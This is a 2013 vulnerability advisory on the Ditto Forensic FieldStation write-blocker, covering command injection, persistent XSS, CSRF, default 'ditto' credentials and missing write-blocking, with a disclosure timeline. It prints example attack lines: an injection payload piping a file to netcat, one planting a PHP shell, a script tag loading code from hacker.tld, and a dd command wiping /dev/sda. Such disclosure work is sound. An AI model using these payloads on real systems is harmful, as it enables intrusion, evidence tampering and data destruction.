Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities





Title: Ditto Forensic FieldStation, multiple vulnerabilities
Versions affected: <= 2013Oct15a (all)
Vendor: CRU Wiebetech
Discovered by: Martin Wundram
Email: wundram@digitrace.de
Date found:     2013-04-22
Date published: 2013-12-12
Status: partially patched

0] ======== Introduction / Background / Impact ========
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one
essential requirement is that evidence data does not get modified at all (or 
not unnoticed, at least). Therefore IT forensic experts use write-blockers to 
ensure a read-only access to evidence data like hard disks or USB mass 

The Ditto Forensic FieldStation is such a special equipment (hardware with
embedded software) used by forensic experts to analyse and copy evidence data 
in a safe and secure way. The ditto is explicitly marketed as a device to 
acquire data from network file shares, too. This means it is meant to be 
connected to possibly hostile networks of suspects.

However it was found to be vulnerable up to the point of not being reliable as 
a computer forensic device.

1] ======== OS Command Injection ========
Class: Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
CVE Name: CVE-2013-6881
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:

Several input fields of the web application are vulnerable to OS command
injection. E.g. the application allows the setting of parameters like 'sector
size' or 'skip count' for a forensic imaging task. Because of improper
neutralization in combination with the web server running with root 
privileges, an attacker is able to access and manipulate the complete system.

Example 1 (setting of 'sector size' = 1 with malicious content):

  1;cat /opt/web/htdocs/index.php | nc 6666;

Example 2 (setting of 'set-size' = 1 with copying a PHP shell from
  the external SD card):

  1;cp /ditto/shell.php /opt/web/htdocs;

2] ======== Persistent XSS ========
Class: Cross-site Scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Status: unpatched
CVE Name: CVE-2013-6882
CVSS v2 Base Score: 9
Overall CVSS v2 Score (if patched): 9.2
CVSS v2 Vector:
Overall CVSS v2 Score (unpatched): 10

The web application suffers from multiple vulnerabilities regarding XSS. The
first one (a) is critical because an unauthorized attacker is able to push
malicious code into the system and consequently attacking every user. The 
other ones (b) need authentication first.

a) The web application logs every login (including the username) in a not
sanitized way to a system log. Additionally, the web application embeds that
system log rendered as HTML into the start page of every user who successfully
logs in. Thus an unprivileged attacker can persistently inject malicious code
which attacks all users of the vulnerable system immediately after their 


b) It is easily possible to submit malicious data as input into multiple HTML
form fields (e.g. one can force the system to load externally hosted 
JavaScript code with <script src=http://www.hacker.tld/code.js></script>). 
This can result in dangerous situations where the (external) JavaScript code 
mangles the information displayed about important computer forensic key values 
whose integrity is crucial.

   784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",
     "verify actions: yes" instead of "no", ...

3] ======== Cross-Site Request Forgery ========
Class: Cross-Site Request Forgery [CWE-352]
Impact: Application misuse
Remotely Exploitable: Yes
CVE Name: CVE-2013-6883
CVSS v2 Base Score: 6.6
Overall CVSS v2 Score: 8
CVSS v2 Vector:

The web application is vulnerable to attacks using Cross-Site Request Forgery.
E.g. the disk erase technique (correct settings are important for the reliable
deletion of sensitive forensic data) can be changed with a simple POST 

4] ======== Misconfigured Daemon Rights ========
Class: Configuration [CWE-16]
Impact: Full system access

The web server lighthttpd and the PHP engine are run as user 'root'. Thus
injection weaknesses in the 'ditto' web application result in immediate full
system access.

5] ======== Unneeded Daemons/Software ========
Class: Configuration [CWE-16]
Impact: Attackable services
Best matching CCE-ID: CCE-4268-9

Forensic usage needs only write-blocking and imaging of evidence data. 
However, the base system contains further active software and services. This 
helps attacking the system and escalating privileges. The tools/daemons are 
especially netcat and an active SSHd. Furthermore, the SSHd binds to the 
network port which is labeled as 'source' and thus intended for usage in 
supposedly hostile network environments - the network containing evidence data 
from suspects.

6] ======== Use of standard credentials ========
Class: Use of Hard-coded Credentials [CWE-798]
Impact: unwanted full system access
Remotely Exploitable: Yes
CVE Name: CVE-2013-6884
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:

The ditto write-blocker contains a default system user named 'ditto' with the
default password 'ditto' which is allowed to elevate its user rights to root
(sudo) without further authentication. In combination with the active SSHd, 
this vulnerability allows attackers full access to the ditto if it gets 
connected to the same/reachable network.

7] ======== Misconfigured Core System ========
Class: Configuration [CWE-16]
Impact: Alteration of evidence data
Remotely Exploitable: Yes

Although explicitly marketed as a hardware write-blocker, the ditto does not
implement any specific write-blocking mechanism at all. The underlying system 
is able to manipulate or even erase evidence on devices which are connected to 
the 'source side' of the ditto. The problem is: no hardware-level, no driver-
level and no kernel-level (blockdev) write-blocking are implemented. Only the 
web application prevents the user from writing to the source media. That is 
just security by obscurity. Finally, every critical weakness or simple 
malfunction in the web application can potentiallly lead to overwriting of 
source/evidence data. 

Furthermore, the embedded Linux system itself mounts the system partition as
writable. Thus malware could be persistently deployed!

  One can simply overwrite supposedly write-protected source data (USB stick 
SATA disk) with
     dd if=/dev/zero of=/dev/sda.

8] ======== Solution ========
Upgrade your ditto to the newest available firmware (2013Oct15a). Don't 
connect the device to potentially hostile networks. Examine your device if it 
has been manipulated at an earlier time (has someone placed a backdoor in the 
embedded Linux, or a malware which silently manipulates evidence data or 
copies of evidence data?).

9] ======== Report Timeline ========
2013-04-22 Discovery of vulnerabilities
2013-04-23 First contact with vendor including agreement about later public
2013-04-26 Detailed information about vulnerabilities provided to vendor
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a
2013-11-26 Information with details provided to vendor about upcoming public
           disclosure. Vendor gave feedback regarding technical accuracy of
           this report
2013-12-12 Public disclosure

10] ======== Discussion ========
Because integrity is of utmost importance during the forensic process (correct
handling of evidence data and correct deduction of conclusions and
implications), even small vulnerabilities in forensic tools and devices become

11] ======== References ========

Diplom-Wirtschaftsinformatiker Martin G. Wundram

DigiTrace GmbH - Kompetenz in IT-Forensik
Geschäftsführer: Alexander Sigel, Martin Wundram
Registergericht Köln, HR B 72919
USt-IdNr: DE278529699

Zollstockgürtel 59, 50969 Köln
Telefon: 0221-6 77 86 95-0
Website: www.DigiTrace.de
E-Mail: info@DigiTrace.de